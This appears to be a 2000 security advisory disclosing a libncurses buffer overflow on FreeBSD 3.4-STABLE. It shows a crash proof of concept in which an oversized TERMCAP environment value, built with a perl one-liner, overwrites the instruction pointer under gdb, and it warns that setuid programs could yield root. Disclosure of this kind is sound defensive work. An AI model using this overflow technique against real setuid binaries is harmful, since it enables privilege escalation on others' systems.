_____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3 Advisory Name: libncurses buffer overflow Date: 24/4/00 Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE Vendor: FreeBSD Inc. WWW: www.freebsd.org Severity: setuid programs linked with libncurses can be exploited to obtain root access. Author: venglin (venglin@freebsd.lublin.pl) Homepage: www.b0f.com * The Problem lubi:venglin:~> cat tescik.c #include main() { initscr(); } lubi:venglin:~> cc -g -o te tescik.c -lncurses lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'` lubi:venglin:~> gdb ./te GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (gdb) run Starting program: /usr/home/venglin/./te Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () * Vulnerable Versions - 3.4-STABLE -- vulnerable - 4.0-STABLE -- not tested (probably *not* vulnerable) - 5.0-CURRENT -- *not* vulnerable